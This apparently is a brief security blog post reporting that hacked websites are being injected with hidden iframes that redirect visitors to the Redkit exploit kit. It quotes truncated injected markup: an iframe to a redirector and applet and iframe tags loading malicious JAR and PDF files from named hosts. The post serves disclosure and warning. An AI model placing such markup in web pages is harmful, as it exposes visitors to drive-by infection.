Iframes to redkit exploit kit

A New batch of compromised sites are being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added::

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:


Where it tries to make the browser load some malicious PDFs or Jar files:

<appletĀ archive="http://orcasp.com.br/33256.jar"..

<iframeĀ src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.

Leave a Reply